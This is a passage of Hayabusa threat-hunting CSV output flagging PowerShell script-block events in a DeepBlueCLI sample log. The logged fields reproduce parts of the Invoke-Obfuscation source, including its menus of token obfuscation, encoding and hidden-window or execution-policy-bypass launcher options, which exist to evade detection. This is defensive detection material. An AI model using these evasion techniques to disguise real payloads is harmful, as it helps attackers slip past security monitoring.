}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Invoke-Obfuscation { <# .SYNOPSIS Master function that orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents. Interactive mode enables one to explore all available obfuscation functions and apply them incrementally to input PowerShell script block or script path contents. Invoke-Obfuscation Function: Invoke-Obfuscation Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Show-AsciiArt, Show-HelpMenu, Show-Menu, Show-OptionsMenu, Show-Tutorial and Out-ScriptContents (all located in Invoke-Obfuscation.ps1) Optional Dependencies: None .DESCRIPTION Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments and common parent-child process relationships. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER ScriptPath Specifies the path to your payload (can be local file, UNC-path, or remote URI). .PARAMETER Command Specifies the obfuscation commands to run against the input ScriptBlock or ScriptPath parameter. .PARAMETER NoExit (Optional - only works if Command is specified) Outputs the option to not exit after running obfuscation commands defined in Command parameter. .PARAMETER Quiet (Optional - only works if Command is specified) Outputs the option to output only the final obfuscated result via stdout. .EXAMPLE C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -Quiet C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit -Quiet .NOTES Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [String] $ScriptPath, [String] $Command, [Switch] $NoExit, [Switch] $Quiet ) # Define variables for CLI functionality. $Script:CliCommands = @() $Script:CompoundCommand = @() $Script:QuietWasSpecified = $FALSE $CliWasSpecified = $FALSE $NoExitWasSpecified = $FALSE # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['ScriptBlock']) { $Script:CliCommands += ('set scriptblock ' + [String]$ScriptBlock) } If($PSBoundParameters['ScriptPath']) { $Script:CliCommands += ('set scriptpath ' + $ScriptPath) } # Append Command to CliCommands if specified by user input. If($PSBoundParameters['Command']) { $Script:CliCommands += $Command.Split(',') $CliWasSpecified = $TRUE If($PSBoundParameters['NoExit']) { $NoExitWasSpecified = $TRUE } If($PSBoundParameters['Quiet']) { # Create empty Write-Host and Start-Sleep proxy functions to cause any Write-Host or Start-Sleep invocations to not do anything until non-interactive -Command values are finished being processed. Function Write-Host {} Function Start-Sleep {} $Script:QuietWasSpecified = $TRUE } } ######################################## ## Script-wide variable instantiation ## ######################################## # Script-level array of Show Options menu, set as SCRIPT-level so it can be set from within any of the functions. # Build out menu for Show Options selection from user in Show-OptionsMenu menu. $Script:ScriptPath = '' $Script:ScriptBlock = '' $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:ObfuscatedCommand = '' $Script:ObfuscatedCommandHistory = @() $Script:ObfuscationLength = '' $Script:OptionsMenu = @() $Script:OptionsMenu += , @('ScriptPath ' , $Script:ScriptPath , $TRUE) $Script:OptionsMenu += , @('ScriptBlock' , $Script:ScriptBlock , $TRUE) $Script:OptionsMenu += , @('CommandLineSyntax' , $Script:CliSyntax , $FALSE) $Script:OptionsMenu += , @('ExecutionCommands' , $Script:ExecutionCommands, $FALSE) $Script:OptionsMenu += , @('ObfuscatedCommand' , $Script:ObfuscatedCommand, $FALSE) $Script:OptionsMenu += , @('ObfuscationLength' , $Script:ObfuscatedCommand, $FALSE) # Build out $SetInputOptions from above items set as $TRUE (as settable). $SettableInputOptions = @() ForEach($Option in $Script:OptionsMenu) { If($Option[2]) {$SettableInputOptions += ([String]$Option[0]).ToLower().Trim()} } # Script-level variable for whether LAUNCHER has been applied to current ObfuscatedToken. $Script:LauncherApplied = $FALSE # Ensure Invoke-Obfuscation module was properly imported before continuing. If(!(Get-Module Invoke-Obfuscation | Where-Object {$_.ModuleType -eq 'Manifest'})) { $PathTopsd1 = ""$ScriptDir\Invoke-Obfuscation.psd1"" If($PathTopsd1.Contains(' ')) {$PathTopsd1 = '""' + $PathTopsd1 + '""'} Write-Host ""`n`nERROR: Invoke-Obfuscation module is not loaded. You must run:"" -ForegroundColor Red Write-Host "" Import-Module $PathTopsd1`n`n"" -ForegroundColor Yellow Exit } # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 # Build interactive menus. $LineSpacing = '[*] ' # Main Menu. $MenuLevel = @() $MenuLevel+= , @($LineSpacing, 'TOKEN' , 'Obfuscate PowerShell command ') $MenuLevel+= , @($LineSpacing, 'STRING' , 'Obfuscate entire command as a ') $MenuLevel+= , @($LineSpacing, 'ENCODING' , 'Obfuscate entire command via ') $MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfuscate command args w/ techniques (run once at end)') # Main\Token Menu. $MenuLevel_Token = @() $MenuLevel_Token += , @($LineSpacing, 'STRING' , 'Obfuscate tokens (suggested to run first)') $MenuLevel_Token += , @($LineSpacing, 'COMMAND' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'ARGUMENT' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'MEMBER' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'VARIABLE' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'TYPE ' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'COMMENT' , 'Remove all tokens') $MenuLevel_Token += , @($LineSpacing, 'WHITESPACE' , 'Insert random (suggested to run last)') $MenuLevel_Token += , @($LineSpacing, 'ALL ' , 'Select choices from above (random order)') $MenuLevel_Token_String = @() $MenuLevel_Token_String += , @($LineSpacing, '1' , ""Concatenate --> e.g. <('co'+'ffe'+'e')>"" , @('Out-ObfuscatedTokenCommand', 'String', 1)) $MenuLevel_Token_String += , @($LineSpacing, '2' , ""Reorder --> e.g. <('{1}{0}'-f'ffee','co')>"" , @('Out-ObfuscatedTokenCommand', 'String', 2)) $MenuLevel_Token_Command = @() $MenuLevel_Token_Command += , @($LineSpacing, '1' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Command', 1)) $MenuLevel_Token_Command += , @($LineSpacing, '2' , ""Splatting + Concatenate --> e.g. <&('Ne'+'w-Ob'+'ject')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 2)) $MenuLevel_Token_Command += , @($LineSpacing, '3' , ""Splatting + Reorder --> e.g. <&('{1}{0}'-f'bject','New-O')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 3)) $MenuLevel_Token_Argument = @() $MenuLevel_Token_Argument += , @($LineSpacing, '1' , 'Random Case --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 1)) $MenuLevel_Token_Argument += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 2)) $MenuLevel_Token_Argument += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('Ne'+'t.We'+'bClient')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 3)) $MenuLevel_Token_Argument += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'bClient','Net.We')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 4)) $MenuLevel_Token_Member = @() $MenuLevel_Token_Member += , @($LineSpacing, '1' , 'Random Case --> e.g. '",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Invoke-Obfuscation { <# .SYNOPSIS Master function that orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents. Interactive mode enables one to explore all available obfuscation functions and apply them incrementally to input PowerShell script block or script path contents. Invoke-Obfuscation Function: Invoke-Obfuscation Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Show-AsciiArt, Show-HelpMenu, Show-Menu, Show-OptionsMenu, Show-Tutorial and Out-ScriptContents (all located in Invoke-Obfuscation.ps1) Optional Dependencies: None .DESCRIPTION Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments and common parent-child process relationships. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER ScriptPath Specifies the path to your payload (can be local file, UNC-path, or remote URI). .PARAMETER Command Specifies the obfuscation commands to run against the input ScriptBlock or ScriptPath parameter. .PARAMETER NoExit (Optional - only works if Command is specified) Outputs the option to not exit after running obfuscation commands defined in Command parameter. .PARAMETER Quiet (Optional - only works if Command is specified) Outputs the option to output only the final obfuscated result via stdout. .EXAMPLE C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -Quiet C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit -Quiet .NOTES Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [String] $ScriptPath, [String] $Command, [Switch] $NoExit, [Switch] $Quiet ) # Define variables for CLI functionality. $Script:CliCommands = @() $Script:CompoundCommand = @() $Script:QuietWasSpecified = $FALSE $CliWasSpecified = $FALSE $NoExitWasSpecified = $FALSE # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['ScriptBlock']) { $Script:CliCommands += ('set scriptblock ' + [String]$ScriptBlock) } If($PSBoundParameters['ScriptPath']) { $Script:CliCommands += ('set scriptpath ' + $ScriptPath) } # Append Command to CliCommands if specified by user input. If($PSBoundParameters['Command']) { $Script:CliCommands += $Command.Split(',') $CliWasSpecified = $TRUE If($PSBoundParameters['NoExit']) { $NoExitWasSpecified = $TRUE } If($PSBoundParameters['Quiet']) { # Create empty Write-Host and Start-Sleep proxy functions to cause any Write-Host or Start-Sleep invocations to not do anything until non-interactive -Command values are finished being processed. Function Write-Host {} Function Start-Sleep {} $Script:QuietWasSpecified = $TRUE } } ######################################## ## Script-wide variable instantiation ## ######################################## # Script-level array of Show Options menu, set as SCRIPT-level so it can be set from within any of the functions. # Build out menu for Show Options selection from user in Show-OptionsMenu menu. $Script:ScriptPath = '' $Script:ScriptBlock = '' $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:ObfuscatedCommand = '' $Script:ObfuscatedCommandHistory = @() $Script:ObfuscationLength = '' $Script:OptionsMenu = @() $Script:OptionsMenu += , @('ScriptPath ' , $Script:ScriptPath , $TRUE) $Script:OptionsMenu += , @('ScriptBlock' , $Script:ScriptBlock , $TRUE) $Script:OptionsMenu += , @('CommandLineSyntax' , $Script:CliSyntax , $FALSE) $Script:OptionsMenu += , @('ExecutionCommands' , $Script:ExecutionCommands, $FALSE) $Script:OptionsMenu += , @('ObfuscatedCommand' , $Script:ObfuscatedCommand, $FALSE) $Script:OptionsMenu += , @('ObfuscationLength' , $Script:ObfuscatedCommand, $FALSE) # Build out $SetInputOptions from above items set as $TRUE (as settable). $SettableInputOptions = @() ForEach($Option in $Script:OptionsMenu) { If($Option[2]) {$SettableInputOptions += ([String]$Option[0]).ToLower().Trim()} } # Script-level variable for whether LAUNCHER has been applied to current ObfuscatedToken. $Script:LauncherApplied = $FALSE # Ensure Invoke-Obfuscation module was properly imported before continuing. If(!(Get-Module Invoke-Obfuscation | Where-Object {$_.ModuleType -eq 'Manifest'})) { $PathTopsd1 = ""$ScriptDir\Invoke-Obfuscation.psd1"" If($PathTopsd1.Contains(' ')) {$PathTopsd1 = '""' + $PathTopsd1 + '""'} Write-Host ""`n`nERROR: Invoke-Obfuscation module is not loaded. You must run:"" -ForegroundColor Red Write-Host "" Import-Module $PathTopsd1`n`n"" -ForegroundColor Yellow Exit } # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 # Build interactive menus. $LineSpacing = '[*] ' # Main Menu. $MenuLevel = @() $MenuLevel+= , @($LineSpacing, 'TOKEN' , 'Obfuscate PowerShell command ') $MenuLevel+= , @($LineSpacing, 'STRING' , 'Obfuscate entire command as a ') $MenuLevel+= , @($LineSpacing, 'ENCODING' , 'Obfuscate entire command via ') $MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfuscate command args w/ techniques (run once at end)') # Main\Token Menu. $MenuLevel_Token = @() $MenuLevel_Token += , @($LineSpacing, 'STRING' , 'Obfuscate tokens (suggested to run first)') $MenuLevel_Token += , @($LineSpacing, 'COMMAND' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'ARGUMENT' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'MEMBER' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'VARIABLE' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'TYPE ' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'COMMENT' , 'Remove all tokens') $MenuLevel_Token += , @($LineSpacing, 'WHITESPACE' , 'Insert random (suggested to run last)') $MenuLevel_Token += , @($LineSpacing, 'ALL ' , 'Select choices from above (random order)') $MenuLevel_Token_String = @() $MenuLevel_Token_String += , @($LineSpacing, '1' , ""Concatenate --> e.g. <('co'+'ffe'+'e')>"" , @('Out-ObfuscatedTokenCommand', 'String', 1)) $MenuLevel_Token_String += , @($LineSpacing, '2' , ""Reorder --> e.g. <('{1}{0}'-f'ffee','co')>"" , @('Out-ObfuscatedTokenCommand', 'String', 2)) $MenuLevel_Token_Command = @() $MenuLevel_Token_Command += , @($LineSpacing, '1' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Command', 1)) $MenuLevel_Token_Command += , @($LineSpacing, '2' , ""Splatting + Concatenate --> e.g. <&('Ne'+'w-Ob'+'ject')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 2)) $MenuLevel_Token_Command += , @($LineSpacing, '3' , ""Splatting + Reorder --> e.g. <&('{1}{0}'-f'bject','New-O')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 3)) $MenuLevel_Token_Argument = @() $MenuLevel_Token_Argument += , @($LineSpacing, '1' , 'Random Case --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 1)) $MenuLevel_Token_Argument += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 2)) $MenuLevel_Token_Argument += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('Ne'+'t.We'+'bClient')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 3)) $MenuLevel_Token_Argument += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'bClient','Net.We')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 4)) $MenuLevel_Token_Member = @() $MenuLevel_Token_Member += , @($LineSpacing, '1' , 'Random Case --> e.g. '",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-ObfuscatedTokenCommand', 'Member', 1)) $MenuLevel_Token_Member += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Member', 2)) $MenuLevel_Token_Member += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('dOwnLo'+'AdsT'+'Ring').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 3)) $MenuLevel_Token_Member += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'dString','Downloa').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 4)) $MenuLevel_Token_Variable = @() $MenuLevel_Token_Variable += , @($LineSpacing, '1' , 'Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' , @('Out-ObfuscatedTokenCommand', 'Variable', 1)) $MenuLevel_Token_Type = @() $MenuLevel_Token_Type += , @($LineSpacing, '1' , ""Type Cast + Concatenate --> e.g. <[Type]('Con'+'sole')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 1)) $MenuLevel_Token_Type += , @($LineSpacing, '2' , ""Type Cast + Reordered --> e.g. <[Type]('{1}{0}'-f'sole','Con')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 2)) $MenuLevel_Token_Whitespace = @() $MenuLevel_Token_Whitespace += , @($LineSpacing, '1' , ""`tRandom Whitespace --> e.g. <.( 'Ne' +'w-Ob' + 'ject')>"" , @('Out-ObfuscatedTokenCommand', 'RandomWhitespace', 1)) $MenuLevel_Token_Comment = @() $MenuLevel_Token_Comment += , @($LineSpacing, '1' , ""Remove Comments --> e.g. self-explanatory"" , @('Out-ObfuscatedTokenCommand', 'Comment', 1)) $MenuLevel_Token_All = @() $MenuLevel_Token_All += , @($LineSpacing, '1' , ""`tExecute Token obfuscation techniques (random order)"" , @('Out-ObfuscatedTokenCommandAll', '', '')) # Main\String Menu. $MenuLevel_String = @() $MenuLevel_String += , @($LineSpacing, '1' , ' entire command' , @('Out-ObfuscatedStringCommand', '', 1)) $MenuLevel_String += , @($LineSpacing, '2' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 2)) $MenuLevel_String += , @($LineSpacing, '3' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 3)) # Main\Encoding Menu. $MenuLevel_Encoding = @() $MenuLevel_Encoding += , @($LineSpacing, '1' , ""`tEncode entire command as "" , @('Out-EncodedAsciiCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '2' , ""`tEncode entire command as "" , @('Out-EncodedHexCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '3' , ""`tEncode entire command as "" , @('Out-EncodedOctalCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '4' , ""`tEncode entire command as "" , @('Out-EncodedBinaryCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '5' , ""`tEncrypt entire command as (AES)"" , @('Out-SecureStringCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '6' , ""`tEncode entire command as "" , @('Out-EncodedBXORCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '7' , ""`tEncode entire command as "" , @('Out-EncodedSpecialCharOnlyCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '8' , ""`tEncode entire command as "" , @('Out-EncodedWhitespaceCommand' , '', '')) # Main\Launcher Menu. $MenuLevel_Launcher = @() $MenuLevel_Launcher += , @($LineSpacing, 'PS' , ""`t"") $MenuLevel_Launcher += , @($LineSpacing, 'CMD' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'WMIC' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'VAR+' , 'Cmd + set && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN+' , 'Cmd + | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP+' , 'Cmd + | Clip && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'VAR++' , 'Cmd + set && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN++' , 'Cmd + set && Cmd | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP++' , 'Cmd + | Clip && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher += , @($LineSpacing, 'MSHTA++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher_PS = @() $MenuLevel_Launcher_PS += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_PS += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_CMD = @() $MenuLevel_Launcher_CMD += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_WMIC = @() $MenuLevel_Launcher_WMIC += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_RUNDLL = @() $MenuLevel_Launcher_RUNDLL += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '4' , '-NoProfile'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,", 